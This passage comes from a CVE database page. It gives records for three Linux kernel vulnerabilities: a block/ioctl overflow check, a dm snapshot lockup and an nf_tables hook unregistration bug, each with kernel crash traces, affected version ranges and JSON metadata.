[ 63.001316] iomap_dio_rw+0x45/0xa0 [ 63.001328] ext4_file_write_iter+0xdde/0x1390 [ 63.001372] vfs_write+0x599/0xbd0 [ 63.001394] ksys_write+0xc8/0x190 [ 63.001403] do_syscall_64+0xd4/0x1b0 [ 63.001421] ? arch_exit_to_user_mode_prepare+0x3a/0x60 [ 63.001479] entry_SYSCALL_64_after_hwframe+0x6f/0x77 [ 63.001535] RIP: 0033:0x7f7fd3ebf539 [ 63.001551] Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 f1 14 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48 [ 63.001562] RSP: 002b:00007f7fd32570c8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001 [ 63.001584] RAX: ffffffffffffffda RBX: 00007f7fd3ff3f80 RCX: 00007f7fd3ebf539 [ 63.001590] RDX: 4db6d1e4f7e43360 RSI: 0000000020000000 RDI: 0000000000000004 [ 63.001595] RBP: 00007f7fd3f1e496 R08: 0000000000000000 R09: 0000000000000000 [ 63.001599] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 [ 63.001604] R13: 0000000000000006 R14: 00007f7fd3ff3f80 R15: 00007ffd415ad2b8 ... [ 63.018142] ---[ end trace ]--- Historically, the signed integer overflow sanitizer did not work in the kernel due to its interaction with `-fwrapv` but this has since been changed [1] in the newest version of Clang; It was re-enabled in the kernel with Commit 557f8c582a9ba8ab ("ubsan: Reintroduce signed overflow sanitizer"). Let's rework this overflow checking logic to not actually perform an overflow during the check itself, thus avoiding the UBSAN splat. [1]: https://github.com/llvm/llvm-project/pull/82432

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/58706e482bf45c4db…
	https://git.kernel.org/stable/c/3220c90f4dbdc6d20…
	https://git.kernel.org/stable/c/61ec76ec930709b7b…
	https://git.kernel.org/stable/c/fd841ee01fb4a79cb…
	https://git.kernel.org/stable/c/54160fb1db2de3674…
	https://git.kernel.org/stable/c/ccb326b5f9e623eb7…

Impacted products

Vendor

Product

Version

Linux

Affected: 8f6dfa1f1efe6dcca2d43e575491d8fcbe922f62 , < 58706e482bf45c4db48b0c53aba2468c97adda24 (git)
Affected: 5010c27120962c85d2f421d2cf211791c9603503 , < 3220c90f4dbdc6d20d0608b164d964434a810d66 (git)
Affected: ef31cc87794731ffcb578a195a2c47d744e25fb8 , < 61ec76ec930709b7bcd69029ef1fe90491f20cf9 (git)
Affected: cb16cc1abda18a9514106d2ac8c8d7abc0be5ed8 , < fd841ee01fb4a79cb7f5cc424b5c96c3a73b2d1e (git)
Affected: 6f64f866aa1ae6975c95d805ed51d7e9433a0016 , < 54160fb1db2de367485f21e30196c42f7ee0be4e (git)
Affected: 6f64f866aa1ae6975c95d805ed51d7e9433a0016 , < ccb326b5f9e623eb7f130fbbf2505ec0e2dcaff9 (git)
Affected: bcdc288e7bc008daf38ef0401b53e4a8bb61bbe5 (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.96 , ≤ 6.1.* (semver)
Unaffected: 6.6.36 , ≤ 6.6.* (semver)
Unaffected: 6.9.7 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:59:02.815Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/58706e482bf45c4db48b0c53aba2468c97adda24"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3220c90f4dbdc6d20d0608b164d964434a810d66"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/61ec76ec930709b7bcd69029ef1fe90491f20cf9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fd841ee01fb4a79cb7f5cc424b5c96c3a73b2d1e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/54160fb1db2de367485f21e30196c42f7ee0be4e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ccb326b5f9e623eb7f130fbbf2505ec0e2dcaff9"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41000",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:01:19.374759Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:19.237Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "block/ioctl.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "58706e482bf45c4db48b0c53aba2468c97adda24",
              "status": "affected",
              "version": "8f6dfa1f1efe6dcca2d43e575491d8fcbe922f62",
              "versionType": "git"
            },
            {
              "lessThan": "3220c90f4dbdc6d20d0608b164d964434a810d66",
              "status": "affected",
              "version": "5010c27120962c85d2f421d2cf211791c9603503",
              "versionType": "git"
            },
            {
              "lessThan": "61ec76ec930709b7bcd69029ef1fe90491f20cf9",
              "status": "affected",
              "version": "ef31cc87794731ffcb578a195a2c47d744e25fb8",
              "versionType": "git"
            },
            {
              "lessThan": "fd841ee01fb4a79cb7f5cc424b5c96c3a73b2d1e",
              "status": "affected",
              "version": "cb16cc1abda18a9514106d2ac8c8d7abc0be5ed8",
              "versionType": "git"
            },
            {
              "lessThan": "54160fb1db2de367485f21e30196c42f7ee0be4e",
              "status": "affected",
              "version": "6f64f866aa1ae6975c95d805ed51d7e9433a0016",
              "versionType": "git"
            },
            {
              "lessThan": "ccb326b5f9e623eb7f130fbbf2505ec0e2dcaff9",
              "status": "affected",
              "version": "6f64f866aa1ae6975c95d805ed51d7e9433a0016",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "bcdc288e7bc008daf38ef0401b53e4a8bb61bbe5",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "block/ioctl.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.96",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.36",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "5.10.215",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "5.15.148",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.96",
                  "versionStartIncluding": "6.1.75",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.36",
                  "versionStartIncluding": "6.6.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.7",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.7.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock/ioctl: prefer different overflow check\n\nRunning syzkaller with the newly reintroduced signed integer overflow\nsanitizer shows this report:\n\n[   62.982337] ------------[ cut here ]------------\n[   62.985692] cgroup: Invalid name\n[   62.986211] UBSAN: signed-integer-overflow in ../block/ioctl.c:36:46\n[   62.989370] 9pnet_fd: p9_fd_create_tcp (7343): problem connecting socket to 127.0.0.1\n[   62.992992] 9223372036854775807 + 4095 cannot be represented in type \u0027long long\u0027\n[   62.997827] 9pnet_fd: p9_fd_create_tcp (7345): problem connecting socket to 127.0.0.1\n[   62.999369] random: crng reseeded on system resumption\n[   63.000634] GUP no longer grows the stack in syz-executor.2 (7353): 20002000-20003000 (20001000)\n[   63.000668] CPU: 0 PID: 7353 Comm: syz-executor.2 Not tainted 6.8.0-rc2-00035-gb3ef86b5a957 #1\n[   63.000677] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[   63.000682] Call Trace:\n[   63.000686]  \u003cTASK\u003e\n[   63.000731]  dump_stack_lvl+0x93/0xd0\n[   63.000919]  __get_user_pages+0x903/0xd30\n[   63.001030]  __gup_longterm_locked+0x153e/0x1ba0\n[   63.001041]  ? _raw_read_unlock_irqrestore+0x17/0x50\n[   63.001072]  ? try_get_folio+0x29c/0x2d0\n[   63.001083]  internal_get_user_pages_fast+0x1119/0x1530\n[   63.001109]  iov_iter_extract_pages+0x23b/0x580\n[   63.001206]  bio_iov_iter_get_pages+0x4de/0x1220\n[   63.001235]  iomap_dio_bio_iter+0x9b6/0x1410\n[   63.001297]  __iomap_dio_rw+0xab4/0x1810\n[   63.001316]  iomap_dio_rw+0x45/0xa0\n[   63.001328]  ext4_file_write_iter+0xdde/0x1390\n[   63.001372]  vfs_write+0x599/0xbd0\n[   63.001394]  ksys_write+0xc8/0x190\n[   63.001403]  do_syscall_64+0xd4/0x1b0\n[   63.001421]  ? arch_exit_to_user_mode_prepare+0x3a/0x60\n[   63.001479]  entry_SYSCALL_64_after_hwframe+0x6f/0x77\n[   63.001535] RIP: 0033:0x7f7fd3ebf539\n[   63.001551] Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 f1 14 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48\n[   63.001562] RSP: 002b:00007f7fd32570c8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\n[   63.001584] RAX: ffffffffffffffda RBX: 00007f7fd3ff3f80 RCX: 00007f7fd3ebf539\n[   63.001590] RDX: 4db6d1e4f7e43360 RSI: 0000000020000000 RDI: 0000000000000004\n[   63.001595] RBP: 00007f7fd3f1e496 R08: 0000000000000000 R09: 0000000000000000\n[   63.001599] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\n[   63.001604] R13: 0000000000000006 R14: 00007f7fd3ff3f80 R15: 00007ffd415ad2b8\n...\n[   63.018142] ---[ end trace ]---\n\nHistorically, the signed integer overflow sanitizer did not work in the\nkernel due to its interaction with `-fwrapv` but this has since been\nchanged [1] in the newest version of Clang; It was re-enabled in the\nkernel with Commit 557f8c582a9ba8ab (\"ubsan: Reintroduce signed overflow\nsanitizer\").\n\nLet\u0027s rework this overflow checking logic to not actually perform an\noverflow during the check itself, thus avoiding the UBSAN splat.\n\n[1]: https://github.com/llvm/llvm-project/pull/82432"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:37:16.679Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/58706e482bf45c4db48b0c53aba2468c97adda24"
        },
        {
          "url": "https://git.kernel.org/stable/c/3220c90f4dbdc6d20d0608b164d964434a810d66"
        },
        {
          "url": "https://git.kernel.org/stable/c/61ec76ec930709b7bcd69029ef1fe90491f20cf9"
        },
        {
          "url": "https://git.kernel.org/stable/c/fd841ee01fb4a79cb7f5cc424b5c96c3a73b2d1e"
        },
        {
          "url": "https://git.kernel.org/stable/c/54160fb1db2de367485f21e30196c42f7ee0be4e"
        },
        {
          "url": "https://git.kernel.org/stable/c/ccb326b5f9e623eb7f130fbbf2505ec0e2dcaff9"
        }
      ],
      "title": "block/ioctl: prefer different overflow check",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41000",
    "datePublished": "2024-07-12T12:37:41.189Z",
    "dateReserved": "2024-07-12T12:17:45.608Z",
    "dateUpdated": "2026-01-05T10:37:16.679Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35805 (GCVE-0-2024-35805)

Vulnerability from cvelistv5 – Published: 2024-05-17 13:23 – Updated: 2026-01-05 10:35

Title

dm snapshot: fix lockup in dm_exception_table_exit

Summary

In the Linux kernel, the following vulnerability has been resolved: dm snapshot: fix lockup in dm_exception_table_exit There was reported lockup when we exit a snapshot with many exceptions. Fix this by adding "cond_resched" to the loop that frees the exceptions.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e7d4cff57c3c43fdd…
	https://git.kernel.org/stable/c/9759ff196e7d248bc…
	https://git.kernel.org/stable/c/116562e804ffc9dc6…
	https://git.kernel.org/stable/c/3d47eb405781cc512…
	https://git.kernel.org/stable/c/e50f83061ac250f90…
	https://git.kernel.org/stable/c/fa5c055800a7fd49a…
	https://git.kernel.org/stable/c/5f4ad4d0b09432962…
	https://git.kernel.org/stable/c/6e7132ed3c07bd8a6…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < e7d4cff57c3c43fdd72342c78d4138f509c7416e (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 9759ff196e7d248bcf8386a7451d6ff8537a7d9c (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 116562e804ffc9dc600adab6326dde31d72262c7 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 3d47eb405781cc5127deca9a14e24b27696087a1 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < e50f83061ac250f90710757a3e51b70a200835e2 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < fa5c055800a7fd49a36bbb52593aca4ea986a366 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 5f4ad4d0b0943296287313db60b3f84df4aad683 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 6e7132ed3c07bd8a6ce3db4bb307ef2852b322dc (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:47.647Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e7d4cff57c3c43fdd72342c78d4138f509c7416e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9759ff196e7d248bcf8386a7451d6ff8537a7d9c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/116562e804ffc9dc600adab6326dde31d72262c7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3d47eb405781cc5127deca9a14e24b27696087a1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e50f83061ac250f90710757a3e51b70a200835e2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fa5c055800a7fd49a36bbb52593aca4ea986a366"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5f4ad4d0b0943296287313db60b3f84df4aad683"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6e7132ed3c07bd8a6ce3db4bb307ef2852b322dc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35805",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:42:41.586817Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:22.063Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/md/dm-snap.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e7d4cff57c3c43fdd72342c78d4138f509c7416e",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "9759ff196e7d248bcf8386a7451d6ff8537a7d9c",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "116562e804ffc9dc600adab6326dde31d72262c7",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "3d47eb405781cc5127deca9a14e24b27696087a1",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "e50f83061ac250f90710757a3e51b70a200835e2",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "fa5c055800a7fd49a36bbb52593aca4ea986a366",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "5f4ad4d0b0943296287313db60b3f84df4aad683",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "6e7132ed3c07bd8a6ce3db4bb307ef2852b322dc",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/md/dm-snap.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm snapshot: fix lockup in dm_exception_table_exit\n\nThere was reported lockup when we exit a snapshot with many exceptions.\nFix this by adding \"cond_resched\" to the loop that frees the exceptions."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:35:18.882Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e7d4cff57c3c43fdd72342c78d4138f509c7416e"
        },
        {
          "url": "https://git.kernel.org/stable/c/9759ff196e7d248bcf8386a7451d6ff8537a7d9c"
        },
        {
          "url": "https://git.kernel.org/stable/c/116562e804ffc9dc600adab6326dde31d72262c7"
        },
        {
          "url": "https://git.kernel.org/stable/c/3d47eb405781cc5127deca9a14e24b27696087a1"
        },
        {
          "url": "https://git.kernel.org/stable/c/e50f83061ac250f90710757a3e51b70a200835e2"
        },
        {
          "url": "https://git.kernel.org/stable/c/fa5c055800a7fd49a36bbb52593aca4ea986a366"
        },
        {
          "url": "https://git.kernel.org/stable/c/5f4ad4d0b0943296287313db60b3f84df4aad683"
        },
        {
          "url": "https://git.kernel.org/stable/c/6e7132ed3c07bd8a6ce3db4bb307ef2852b322dc"
        }
      ],
      "title": "dm snapshot: fix lockup in dm_exception_table_exit",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35805",
    "datePublished": "2024-05-17T13:23:13.554Z",
    "dateReserved": "2024-05-17T12:19:12.342Z",
    "dateUpdated": "2026-01-05T10:35:18.882Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36005 (GCVE-0-2024-36005)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:48 – Updated: 2025-05-04 09:10

Title

netfilter: nf_tables: honor table dormant flag from netdev release event path

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: honor table dormant flag from netdev release event path Check for table dormant flag otherwise netdev release event path tries to unregister an already unregistered hook. [524854.857999] ------------[ cut here ]------------ [524854.858010] WARNING: CPU: 0 PID: 3386599 at net/netfilter/core.c:501 __nf_unregister_net_hook+0x21a/0x260 [...] [524854.858848] CPU: 0 PID: 3386599 Comm: kworker/u32:2 Not tainted 6.9.0-rc3+ #365 [524854.858869] Workqueue: netns cleanup_net [524854.858886] RIP: 0010:__nf_unregister_net_hook+0x21a/0x260 [524854.858903] Code: 24 e8 aa 73 83 ff 48 63 43 1c 83 f8 01 0f 85 3d ff ff ff e8 98 d1 f0 ff 48 8b 3c 24 e8 8f 73 83 ff 48 63 43 1c e9 26 ff ff ff <0f> 0b 48 83 c4 18 48 c7 c7 00 68 e9 82 5b 5d 41 5c 41 5d 41 5e 41 [524854.858914] RSP: 0018:ffff8881e36d79e0 EFLAGS: 00010246 [524854.858926] RAX: 0000000000000000 RBX: ffff8881339ae790 RCX: ffffffff81ba524a [524854.858936] RDX: dffffc0000000000 RSI: 0000000000000008 RDI: ffff8881c8a16438 [524854.858945] RBP: ffff8881c8a16438 R08: 0000000000000001 R09: ffffed103c6daf34 [524854.858954] R10: ffff8881e36d79a7 R11: 0000000000000000 R12: 0000000000000005 [524854.858962] R13: ffff8881c8a16000 R14: 0000000000000000 R15: ffff8881351b5a00 [524854.858971] FS: 0000000000000000(0000) GS:ffff888390800000(0000) knlGS:0000000000000000 [524854.858982] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [524854.858991] CR2: 00007fc9be0f16f4 CR3: 00000001437cc004 CR4: 00000000001706f0 [524854.859000] Call Trace: [524854.859006] <TASK> [524854.859013] ? __warn+0x9f/0x1a0 [524854.859027] ? __nf_unregister_net_hook+0x21a/0x260 [524854.859044] ? report_bug+0x1b1/0x1e0 [524854.859060] ? handle_bug+0x3c/0x70 [524854.859071] ? exc_invalid_op+0x17/0x40 [524854.859083] ? asm_exc_invalid_op+0x1a/0x20 [524854.859100] ? __nf_unregister_net_hook+0x6a/0x260 [524854.859116] ? __nf_unregister_net_hook+0x21a/0x260 [524854.859135] nf_tables_netdev_event+0x337/0x390 [nf_tables] [524854.859304] ? __pfx_nf_tables_netdev_event+0x10/0x10 [nf_tables] [524854.859461] ? packet_notifier+0xb3/0x360 [524854.859476] ? _raw_spin_unlock_irqrestore+0x11/0x40 [524854.859489] ? dcbnl_netdevice_event+0x35/0x140 [524854.859507] ? __pfx_nf_tables_netdev_event+0x10/0x10 [nf_tables] [524854.859661] notifier_call_chain+0x7d/0x140 [524854.859677] unregister_netdevice_many_notify+0x5e1/0xae0

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e4bb6da24de336a78…
	https://git.kernel.org/stable/c/5c45feb3c288cf44a…
	https://git.kernel.org/stable/c/13ba94f6cc820fdea…
	https://git.kernel.org/stable/c/8260c980aee7d8d8a…
	https://git.kernel.org/stable/c/ca34c40d1c22c555f…
	https://git.kernel.org/stable/c/8e30abc9ace4f0add…

Impacted products

Vendor

Product

Version

Linux

Affected: d54725cd11a57c30f650260cfb0a92c268bdc3e0 , < e4bb6da24de336a7899033a65490ed2d892efa5b (git)
